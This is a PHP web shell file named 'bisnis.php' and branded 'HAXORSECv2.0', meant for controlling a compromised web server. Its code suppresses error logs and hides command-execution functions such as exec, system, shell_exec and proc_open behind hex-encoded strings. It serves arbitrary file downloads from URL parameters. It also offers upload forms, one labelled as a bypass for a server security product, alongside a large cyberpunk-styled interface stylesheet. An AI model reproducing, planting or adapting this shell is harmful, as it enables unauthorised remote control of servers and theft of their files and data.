bisnis.php
<!--?php
@set_time_limit(0);@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$Array = [
'676574637764', # ge tcw d => 0
'676c6f62', # gl ob => 1
'69735f646972', # is_d ir => 2
'69735f66696c65', # is_ file => 3
'69735f7772697461626c65', # is_wr iteable => 4
'69735f7265616461626c65', # is_re adble => 5
'66696c657065726d73', # fileper ms => 6
'66696c65', # f ile => 7
'7068705f756e616d65', # php_unam e => 8
'6765745f63757272656e745f75736572', # getc urrentuser => 9
'68746d6c7370656369616c6368617273', # html special => 10
'66696c655f6765745f636f6e74656e7473', # fil e_get_contents => 11
'6d6b646972', # mk dir => 12
'746f756368', # to uch => 13
'6368646972', # ch dir => 14
'72656e616d65', # ren ame => 15
'65786563', # exe c => 16
'7061737374687275', # pas sthru => 17
'73797374656d', # syst em => 18
'7368656c6c5f65786563', # sh ell_exec => 19
'706f70656e', # p open => 20
'70636c6f7365', # pcl ose => 21
'73747265616d5f6765745f636f6e74656e7473', # stre amgetcontents => 22
'70726f635f6f70656e', # p roc_open => 23
'756e6c696e6b', # un link => 24
'726d646972', # rmd ir => 25
'666f70656e', # fop en => 26
'66636c6f7365', # fcl ose => 27
'66696c655f7075745f636f6e74656e7473', # file_put_c ontents => 28
'6d6f76655f75706c6f616465645f66696c65', # move_up loaded_file => 29
'63686d6f64', # ch mod => 30
'7379735f6765745f74656d705f646972', # temp _dir => 31
'6261736536345F6465636F6465', # => base64 _decode => 32
'6261736536345F656E636F6465', # => ba se6 4_ encode => 33
'636f7079' # co py => 34
];
$hitung_array = count($Array);
for ($i = 0; $i < $hitung_array; $i++) {
$fungsi[] = unx($Array[$i]);
}
if (isset($_GET['d'])) {
$cdir = unx($_GET['d']);
$fungsi[14]($cdir);
} else {
$cdir = $fungsi[0]();
}
function file_ext($file)
{
if (mime_content_type($file) == 'image/png' or mime_content_type($file) == 'image/jpeg') {
return '';
} else if (mime_content_type($file) == 'application/x-httpd-php' or mime_content_type($file) == 'text/html') {
return '';
} else if (mime_content_type($file) == 'text/javascript') {
return '';
} else if (mime_content_type($file) == 'application/zip' or mime_content_type($file) == 'application/x-7z-compressed') {
return '';
} else if (mime_content_type($file) == 'text/plain') {
return '';
} else if (mime_content_type($file) == 'application/pdf') {
return '';
} else {
return '';
}
}
function download($file)
{
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file);
exit;
}
}
if (!empty($_GET['don'])) {
$FilesDon = download(unx($_GET['don']));
}
?>
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;500;600;700&family=Roboto+Mono:wght@300;400;500;600;700&display=swap');
:root {
--primary: #0f172a;
--secondary: #020617;
--accent: #3b82f6;
--accent-hover: #60a5fa;
--text: #e2e8f0;
--highlight: #93c5fd;
--danger: #ef4444;
--success: #10b981;
--warning: #f59e0b;
}
body {
font-family: 'Roboto Mono', monospace;
background-color: var(--secondary);
color: var(--text);
margin: 0;
padding: 0;
overflow-x: hidden;
}
.cyber-font {
font-family: 'Orbitron', sans-serif;
}
.glass-effect {
background: rgba(15, 23, 42, 0.7);
backdrop-filter: blur(10px);
-webkit-backdrop-filter: blur(10px);
border: 1px solid rgba(255, 255, 255, 0.1);
box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
}
.cyber-border {
border: 1px solid rgba(59, 130, 246, 0.3);
box-shadow: 0 0 10px rgba(59, 130, 246, 0.3);
}
.sidebar {
width: 280px;
transition: all 0.3s;
background: linear-gradient(135deg, rgba(15, 23, 42, 0.9) 0%, rgba(2, 6, 23, 0.9) 100%);
}
.main-content {
margin-left: 280px;
transition: all 0.3s;
}
.file-icon {
transition: all 0.2s;
}
.file-icon:hover {
transform: scale(1.1);
}
.nav-link {
transition: all 0.2s;
border-left: 3px solid transparent;
}
.nav-link:hover {
background: rgba(59, 130, 246, 0.1);
border-left: 3px solid var(--accent);
}
.nav-link.active {
background: rgba(59, 130, 246, 0.2);
border-left: 3px solid var(--accent);
}
.badge {
background: #830000;
color: white;
font-size: 0.7rem;
padding: 2px 6px;
border-radius: 4px;
}
.file-item:hover {
background: rgba(59, 130, 246, 0.1);
}
.action-btn {
transition: all 0.2s;
opacity: 0;
}
.file-item:hover .action-btn {
opacity: 1;
}
::-webkit-scrollbar {
width: 8px;
height: 8px;
}
::-webkit-scrollbar-track {
background: var(--secondary);
}
::-webkit-scrollbar-thumb {
background: var(--accent);
border-radius: 4px;
}
.CodeMirror {
height: 70vh;
font-family: 'Roboto Mono', monospace !important;
font-size: 14px;
}
.terminal-output {
font-family: 'Roboto Mono', monospace;
background: #0f172a;
color: #93c5fd;
}
.terminal-input {
font-family: 'Roboto Mono', monospace;
background: #0f172a;
color: #93c5fd;
caret-color: #93c5fd;
}
.path-breadcrumb {
font-family: 'Roboto Mono', monospace;
}
.file-type-icon {
width: 24px;
height: 24px;
display: inline-flex;
align-items: center;
justify-content: center;
margin-right: 8px;
}
/* Database connection form */
.db-form-input {
background: rgba(15, 23, 42, 0.5);
border: 1px solid rgba(59, 130, 246, 0.3);
color: var(--text);
padding: 0.75rem;
border-radius: 0.25rem;
margin-bottom: 1rem;
width: 100%;
}
.db-form-input:focus {
outline: none;
border-color: var(--accent);
box-shadow: 0 0 0 2px rgba(59, 130, 246, 0.3);
}
.db-form-label {
display: block;
margin-bottom: 0.5rem;
color: var(--accent);
font-family: 'Orbitron', sans-serif;
}
.db-connect-btn {
background: var(--accent);
color: white;
border: none;
padding: 0.75rem 1.5rem;
border-radius: 0.25rem;
cursor: pointer;
transition: all 0.3s;
font-family: 'Orbitron', sans-serif;
}
.db-connect-btn:hover {
background: var(--accent-hover);
}
/* Database tables list */
.db-tables-list {
max-height: 300px;
overflow-y: auto;
margin-top: 1rem;
border: 1px solid rgba(59, 130, 246, 0.3);
border-radius: 0.25rem;
}
.db-table-item {
padding: 0.75rem;
border-bottom: 1px solid rgba(59, 130, 246, 0.1);
cursor: pointer;
transition: all 0.3s;
}
.db-table-item:hover {
background: rgba(59, 130, 246, 0.1);
}
.db-table-item.active {
background: rgba(59, 130, 246, 0.2);
border-left: 3px solid var(--accent);
}
/* Cyberpunk glow effect */
.cyber-glow {
text-shadow: 0 0 5px rgba(59, 130, 246, 0.7);
}
.cyber-glow-danger {
text-shadow: 0 0 5px rgba(239, 68, 68, 0.7);
}
.cyber-glow-success {
text-shadow: 0 0 5px rgba(16, 185, 129, 0.7);
}
.cyber-glow-warning {
text-shadow: 0 0 5px rgba(245, 158, 11, 0.7);
}
/* Progress bars */
.progress-container {
height: 6px;
background: rgba(15, 23, 42, 0.5);
border-radius: 3px;
overflow: hidden;
}
.progress-bar {
height: 100%;
transition: width 0.3s ease;
}
.progress-cpu {
background: linear-gradient(90deg, #3b82f6, #60a5fa);
}
.progress-mem {
background: linear-gradient(90deg, #10b981, #34d399);
}
.progress-disk {
background: linear-gradient(90deg, #f59e0b, #fbbf24);
}
/* System info cards */
.info-card {
background: linear-gradient(135deg, rgba(15, 23, 42, 0.7) 0%, rgba(2, 6, 23, 0.7) 100%);
border: 1px solid rgba(59, 130, 246, 0.2);
transition: all 0.3s;
}
.info-card:hover {
border-color: rgba(59, 130, 246, 0.5);
box-shadow: 0 0 15px rgba(59, 130, 246, 0.2);
}
/* Process table */
.process-table {
width: 100%;
border-collapse: collapse;
font-size: 0.875rem;
}
.process-table th {
background: rgba(15, 23, 42, 0.5);
padding: 0.75rem;
text-align: left;
border-bottom: 1px solid rgba(59, 130, 246, 0.3);
font-family: 'Orbitron', sans-serif;
color: var(--accent);
}
.process-table td {
padding: 0.5rem 0.75rem;
border-bottom: 1px solid rgba(59, 130, 246, 0.1);
}
.process-table tr:hover {
background: rgba(59, 130, 246, 0.1);
}
.process-pid {
color: var(--accent);
font-weight: bold;
}
.process-user {
color: var(--success);
}
.process-cpu {
color: var(--warning);
}
.process-mem {
color: var(--danger);
}
.process-command {
font-family: 'Roboto Mono', monospace;
max-width: 200px;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
/* Network connections */
.network-table {
width: 100%;
border-collapse: collapse;
font-size: 0.875rem;
}
.network-table th {
background: rgba(15, 23, 42, 0.5);
padding: 0.75rem;
text-align: left;
border-bottom: 1px solid rgba(59, 130, 246, 0.3);
font-family: 'Orbitron', sans-serif;
color: var(--accent);
}
.network-table td {
padding: 0.5rem 0.75rem;
border-bottom: 1px solid rgba(59, 130, 246, 0.1);
}
.network-table tr:hover {
background: rgba(59, 130, 246, 0.1);
}
.network-local {
color: var(--accent);
}
.network-remote {
color: var(--success);
}
.network-status {
color: var(--warning);
}
.network-pid {
color: var(--danger);
}
/* Database tables */
.database-table {
width: 100%;
border-collapse: collapse;
font-size: 0.875rem;
}
.database-table th {
background: rgba(15, 23, 42, 0.5);
padding: 0.75rem;
text-align: left;
border-bottom: 1px solid rgba(59, 130, 246, 0.3);
font-family: 'Orbitron', sans-serif;
color: var(--accent);
}
.database-table td {
padding: 0.5rem 0.75rem;
border-bottom: 1px solid rgba(59, 130, 246, 0.1);
}
.database-table tr:hover {
background: rgba(59, 130, 246, 0.1);
}
.database-name {
color: var(--accent);
}
.database-size {
color: var(--success);
}
.database-rows {
color: var(--warning);
}
/* Mobile styles */
@media (max-width: 768px) {
.sidebar {
width: 100%;
position: fixed;
height: auto;
bottom: 0;
left: 0;
z-index: 50;
transform: translateY(calc(100% - 56px));
transition: transform 0.3s ease;
}
.sidebar.active {
transform: translateY(0);
}
.main-content {
margin-left: 0;
margin-bottom: 56px;
}
.sidebar-toggle {
display: flex;
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 42px;
background: rgba(15, 23, 42, 0.9);
z-index: 60;
justify-content: center;
align-items: center;
cursor: pointer;
backdrop-filter: blur(8px);
box-shadow: 0 2px 8px rgba(0,0,0,0.3);
}
.file-manager-grid {
grid-template-columns: 1fr !important;
}
.file-item {
grid-template-columns: repeat(12, 1fr) !important;
gap: 0;
}
.file-info {
display: flex;
align-items: center;
}
.file-actions {
display: flex;
justify-content: flex-end;
gap: 8px;
}
.modal {
padding: 0 16px;
}
.modal-content {
width: 100% !important;
max-width: 100% !important;
}
.path-breadcrumb {
overflow-x: auto;
white-space: nowrap;
padding: 8px 0;
}
.server-info {
grid-template-columns: 1fr 1fr !important;
gap: 8px;
}
/* Process table mobile */
.process-table th,
.process-table td {
padding: 0.5rem;
font-size: 0.75rem;
}
/* Network table mobile */
.network-table th,
.network-table td {
padding: 0.5rem;
font-size: 0.75rem;
}
/* Database table mobile */
.database-table th,
.database-table td {
padding: 0.5rem;
font-size: 0.75rem;
}
}
/* Dark mode toggle */
.dark-mode-toggle {
position: fixed;
bottom: 20px;
right: 20px;
z-index: 100;
width: 50px;
height: 50px;
border-radius: 50%;
background: var(--accent);
display: flex;
justify-content: center;
align-items: center;
cursor: pointer;
box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
transition: all 0.3s;
}
.dark-mode-toggle:hover {
transform: scale(1.1);
box-shadow: 0 0 15px rgba(59, 130, 246, 0.5);
}
/* Cyberpunk terminal effect */
.cyber-terminal {
position: relative;
}
.cyber-terminal::before {
content: "";
position: absolute;
top: 0;
left: 0;
right: 0;
height: 2px;
background: linear-gradient(90deg, rgba(59, 130, 246, 0), rgba(59, 130, 246, 0.8), rgba(59, 130, 246, 0));
animation: scanline 2s linear infinite;
}
@keyframes scanline {
0% { transform: translateY(-100%); }
100% { transform: translateY(100vh); }
}
/* Cyberpunk buttons */
.cyber-btn {
position: relative;
overflow: hidden;
transition: all 0.3s;
border: 1px solid var(--accent);
}
.cyber-btn::before {
content: "";
position: absolute;
top: 0;
left: -100%;
width: 100%;
height: 100%;
background: linear-gradient(90deg, transparent, rgba(59, 130, 246, 0.4), transparent);
transition: all 0.5s;
}
.cyber-btn:hover::before {
left: 100%;
}
.cyber-btn-danger {
border-color: var(--danger);
}
.cyber-btn-danger::before {
background: linear-gradient(90deg, transparent, rgba(239, 68, 68, 0.4), transparent);
}
.cyber-btn-success {
border-color: var(--success);
}
.cyber-btn-success::before {
background: linear-gradient(90deg, transparent, rgba(16, 185, 129, 0.4), transparent);
}
/* System stats grid */
.stats-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
gap: 1rem;
}
/* Cyberpunk panel */
.cyber-panel {
position: relative;
border: 1px solid rgba(59, 130, 246, 0.3);
background: rgba(15, 23, 42, 0.5);
}
.cyber-panel::before {
content: "";
position: absolute;
top: 0;
left: 0;
right: 0;
height: 1px;
background: linear-gradient(90deg, transparent, rgba(59, 130, 246, 0.8), transparent);
}
.cyber-panel::after {
content: "";
position: absolute;
bottom: 0;
left: 0;
right: 0;
height: 1px;
background: linear-gradient(90deg, transparent, rgba(59, 130, 246, 0.8), transparent);
}
/* Disabled functions table */
.disabled-functions-table {
width: 100%;
border-collapse: collapse;
margin-top: 1rem;
}
.disabled-functions-table th {
background: rgba(15, 23, 42, 0.5);
padding: 0.75rem;
text-align: left;
border-bottom: 1px solid rgba(59, 130, 246, 0.3);
font-family: 'Orbitron', sans-serif;
color: var(--accent);
}
.disabled-functions-table td {
padding: 0.75rem;
border-bottom: 1px solid rgba(59, 130, 246, 0.1);
}
.disabled-functions-table tr:hover {
background: rgba(59, 130, 246, 0.1);
}
.danger-badge {
background: rgba(239, 68, 68, 0.2);
color: var(--danger);
padding: 0.25rem 0.5rem;
border-radius: 0.25rem;
font-size: 0.75rem;
font-weight: bold;
}
.success-badge {
background: rgba(16, 185, 129, 0.2);
color: var(--success);
padding: 0.25rem 0.5rem;
border-radius: 0.25rem;
font-size: 0.75rem;
font-weight: bold;
}
/* Tab navigation */
.tab-nav {
display: flex;
border-bottom: 1px solid rgba(59, 130, 246, 0.3);
margin-bottom: 1rem;
}
.tab-link {
padding: 0.75rem 1.5rem;
cursor: pointer;
border-bottom: 2px solid transparent;
transition: all 0.3s;
font-family: 'Orbitron', sans-serif;
}
.tab-link:hover {
color: var(--accent);
border-bottom-color: rgba(59, 130, 246, 0.5);
}
.tab-link.active {
color: var(--accent);
border-bottom-color: var(--accent);
}
/* Kill process button */
.kill-process-btn {
background: rgba(239, 68, 68, 0.2);
color: var(--danger);
border: 1px solid var(--danger);
padding: 0.25rem 0.5rem;
border-radius: 0.25rem;
font-size: 0.75rem;
cursor: pointer;
transition: all 0.3s;
}
.kill-process-btn:hover {
background: rgba(239, 68, 68, 0.4);
}
/* Database query box */
.query-box {
width: 100%;
background: rgba(15, 23, 42, 0.5);
border: 1px solid rgba(59, 130, 246, 0.3);
color: var(--text);
padding: 0.75rem;
font-family: 'Roboto Mono', monospace;
border-radius: 0.25rem;
margin-bottom: 1rem;
min-height: 100px;
}
/* Database results */
.query-results {
max-height: 400px;
overflow-y: auto;
margin-top: 1rem;
}
</style>
MENU
HAXORSECv2.0
<button class="close-sidebar md:hidden text-gray-400 hover:text-white"></button>
QUICK ACTIONS
NORMAL UPLOAD
<form action="" class="mb-6" enctype="<?= "\\x6d\\x75\\x6c\\x74\\x69\\x70\\x61\\x72\\x74\\x2f\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61"; ?>" method="post"> </form>
<input class="hidden" id="file-upload" name="haxorsec-upload" type="file" />
Upload
<button class="bg-teal-600 hover:bg-teal-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn cyber-btn-success" name="haxorsec-up-submit" type="submit"></button>
Submit
BITNINJA BYPASS
<form action="" class="mb-6" enctype="<?= "\\x6d\\x75\\x6c\\x74\\x69\\x70\\x61\\x72\\x74\\x2f\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61"; ?>" method="post"> </form>
<input class="hidden" id="file-uploads" name="bitninja-upload" type="file" />
Upload
<button class="bg-teal-600 hover:bg-teal-700 text-white px-3 py-1 rounded text-sm flex items-center cyber-btn cyber-btn-success" name="bitninja-up-submit" type="submit"></button>
Submit